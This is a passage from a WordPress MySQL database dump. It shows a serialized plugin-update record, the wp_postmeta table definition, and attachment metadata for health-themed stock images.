1x\";s:63:\"https://ps.w.org/redirection/assets/icon-128x128.jpg?rev=983640\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/redirection/assets/banner-1544x500.jpg?rev=983641\";s:2:\"1x\";s:65:\"https://ps.w.org/redirection/assets/banner-772x250.jpg?rev=983642\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:25:\"sucuri-scanner/sucuri.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:28:\"w.org/plugins/sucuri-scanner\";s:4:\"slug\";s:14:\"sucuri-scanner\";s:6:\"plugin\";s:25:\"sucuri-scanner/sucuri.php\";s:11:\"new_version\";s:6:\"1.8.36\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/sucuri-scanner/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/sucuri-scanner.1.8.36.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/sucuri-scanner/assets/icon-256x256.png?rev=2498042\";s:2:\"1x\";s:67:\"https://ps.w.org/sucuri-scanner/assets/icon-128x128.png?rev=2498042\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/sucuri-scanner/assets/banner-772x250.png?rev=2498042\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.6\";s:6:\"tested\";s:5:\"6.0.3\";s:12:\"requires_php\";b:0;}s:23:\"wordfence/wordfence.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/wordfence\";s:4:\"slug\";s:9:\"wordfence\";s:6:\"plugin\";s:23:\"wordfence/wordfence.php\";s:11:\"new_version\";s:5:\"7.8.2\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/wordfence/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/wordfence.7.8.2.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/wordfence/assets/icon-256x256.png?rev=2070855\";s:2:\"1x\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";s:3:\"svg\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wordfence/assets/banner-1544x500.jpg?rev=2124102\";s:2:\"1x\";s:64:\"https://ps.w.org/wordfence/assets/banner-772x250.jpg?rev=2124102\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.9\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.3\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:1:{s:9:\"hello.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/hello-dolly/assets/banner-1544x500.jpg?rev=2645582\";s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}}s:7:\"checked\";a:11:{s:19:\"akismet/akismet.php\";s:6:\"4.1.12\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:4:\"7.47\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:5:\"4.4.8\";s:39:\"disable-gutenberg/disable-gutenberg.php\";s:3:\"2.5\";s:23:\"elementor/elementor.php\";s:5:\"3.3.1\";s:9:\"hello.php\";s:5:\"1.7.2\";s:49:\"zotya-htaccess-protect/zotya-htaccess-protect.php\";s:5:\"0.6.0\";s:27:\"redirection/redirection.php\";s:5:\"5.1.3\";s:25:\"sucuri-scanner/sucuri.php\";s:6:\"1.8.28\";s:23:\"wordfence/wordfence.php\";s:5:\"7.5.5\";s:23:\"wp-cerber/wp-cerber.php\";s:5:\"8.8.5\";}}','no'),(132710,'_transient_doing_cron','1675210378.5371019840240478515625','yes');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_postmeta`
--
DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `post_id` (`post_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=528 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_postmeta`
--
LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (6,5,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7,5,'_edit_last','1'),(8,5,'_wp_page_template','default'),(9,5,'_wpb_vc_js_status','false'),(10,5,'_edit_lock','1550506666:1'),(11,7,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(12,7,'_edit_last','1'),(13,7,'_wp_page_template','default'),(14,7,'_wpb_vc_js_status','false'),(15,7,'_edit_lock','1541501383:1'),(16,9,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(17,9,'_edit_last','1'),(18,9,'_wp_page_template','default'),(19,9,'_wpb_vc_js_status','false'),(20,9,'_edit_lock','1517299284:1'),(21,11,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(22,11,'_edit_last','1'),(23,11,'_wp_page_template','default'),(24,11,'_wpb_vc_js_status','false'),(25,11,'_edit_lock','1517299257:1'),(26,13,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27,13,'_edit_last','1'),(28,13,'_wp_page_template','default'),(29,13,'_wpb_vc_js_status','false'),(30,13,'_edit_lock','1523971182:1'),(31,15,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32,15,'_edit_last','1'),(33,15,'_wp_page_template','default'),(34,15,'_wpb_vc_js_status','false'),(35,15,'_edit_lock','1517299902:1'),(36,17,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(37,17,'_edit_last','1'),(38,17,'_wp_page_template','default'),(39,17,'_wpb_vc_js_status','false'),(40,17,'_edit_lock','1517299281:1'),(41,20,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42,20,'_edit_last','1'),(43,20,'_edit_lock','1662783271:2'),(44,20,'_wp_page_template','default'),(45,20,'_wpb_vc_js_status','false'),(46,22,'_wp_attached_file','2018/01/1firstaidpexels-photo-271317.jpeg'),(47,22,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4500;s:6:\"height\";i:3000;s:4:\"file\";s:41:\"2018/01/1firstaidpexels-photo-271317.jpeg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"1firstaidpexels-photo-271317-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"1firstaidpexels-photo-271317-300x200.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"1firstaidpexels-photo-271317-768x512.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"1firstaidpexels-photo-271317-1024x683.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 50D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(48,23,'_wp_attached_file','2018/01/563142823_1280x720.jpg'),(49,23,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:30:\"2018/01/563142823_1280x720.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"563142823_1280x720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"563142823_1280x720-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"563142823_1280x720-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"563142823_1280x720-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(50,24,'_wp_attached_file','2018/01/27247021692_90a8a4d76e_b.jpg'),(51,24,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:642;s:4:\"file\";s:36:\"2018/01/27247021692_90a8a4d76e_b.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"27247021692_90a8a4d76e_b-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"27247021692_90a8a4d76e_b-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"27247021692_90a8a4d76e_b-768x482.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:482;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"27247021692_90a8a4d76e_b-1024x642.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:642;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52,25,'_wp_attached_file','2018/01/acupuncture-legs.jpg'),(53,25,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:637;s:4:\"file\";s:28:\"2018/01/acupuncture-legs.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"acupuncture-legs-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"acupuncture-legs-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"acupuncture-legs-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(54,26,'_wp_attached_file','2018/01/Alcohol-Bottles-Drink-2687103.jpg'),(55,26,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:41:\"2018/01/Alcohol-Bottles-Drink-2687103.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Alcohol-Bottles-Drink-2687103-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Alcohol-Bottles-Drink-2687103-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"Alcohol-Bottles-Drink-2687103-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:37:\"http://maxpixel.freegreatpicture.com/\";s:6:\"camera\";s:26:\"Canon EOS DIGITAL REBEL XS\";s:7:\"caption\";s:42:\"Booze Bar Liquor Pub Alcohol Bottles Drink\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:21:\"Copyright by MaxPixel\";s:12:\"focal_length\";s:2:\"48\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.125\";s:5:\"title\";s:42:\"Booze Bar Liquor Pub Alcohol Bottles Drink\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:1:{i:0;s:81:\"Liquor,Bottles,Alcohol,Drink,Bar,Booze,Pub,Cocktail,MaxPixel,FreeGreatPicture.com\";}}}'),(56,27,'_wp_attached_file','2018/01/alcohol-drink.jpg'),(57,27,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1125;s:6:\"height\";i:750;s:4:\"file\";s:25:\"2018/01/alcohol-drink.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"alcohol-drink-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"alcohol-drink-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"alcohol-drink-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"alcohol-drink-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(58,28,'_wp_attached_file','2018/01/article-2222972-15ADA09D000005DC-373_634x494.jpg'),(59,28,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:634;s:6:\"height\";i:494;s:4:\"file\";s:56:\"2018/01/article-2222972-15ADA09D000005DC-373_634x494.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"article-2222972-15ADA09D000005DC-373_634x494-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"article-2222972-15ADA09D000005DC-373_634x494-300x234.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:234;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(60,29,'_wp_attached_file','2018/01/baby-holding-hand.jpg'),(61,29,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:29:\"2018/01/baby-holding-hand.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"baby-holding-hand-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"baby-holding-hand-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"baby-holding-hand-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(62,30,'_wp_attached_file','2018/01/baby.jpg'),(63,30,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:16:\"2018/01/baby.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"baby-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"baby-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"baby-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(64,31,'_wp_attached_file','2018/01/baby-feet.jpg'),(65,31,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:21:\"2018/01/baby-feet.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"baby-feet-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"baby-feet-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"baby-feet-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(66,33,'_wp_attached_file','2018/01/baby-hand.jpg'),(67,33,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:21:\"2018/01/baby-hand.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"baby-hand-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"baby-hand-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"baby-hand-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(68,34,'_wp_attached_file','2018/01/back-massage.jpg'),(69,34,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:24:\"2018/01/back-massage.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"back-massage-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"back-massage-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"back-massage-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:22:\"Canon EOS 300D DIGITAL\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"25\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(70,35,'_wp_attached_file','2018/01/black-white-pregnant.jpg'),(71,35,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:635;s:4:\"file\";s:32:\"2018/01/black-white-pregnant.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"black-white-pregnant-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"black-white-pregnant-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"black-white-pregnant-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(72,36,'_wp_attached_file','2018/01/blood-pressure-machine.jpg'),(73,36,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:34:\"2018/01/blood-pressure-machine.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"blood-pressure-machine-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"blood-pressure-machine-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"blood-pressure-machine-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(74,37,'_wp_attached_file','2018/01/cigarette-smoke-embers-ash-70088.jpeg'),(75,37,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1184;s:6:\"height\";i:750;s:4:\"file\";s:45:\"2018/01/cigarette-smoke-embers-ash-70088.jpeg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"cigarette-smoke-embers-ash-70088-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"cigarette-smoke-embers-ash-70088-300x190.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"cigarette-smoke-embers-ash-70088-768x486.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"cigarette-smoke-embers-ash-70088-1024x649.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:649;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0: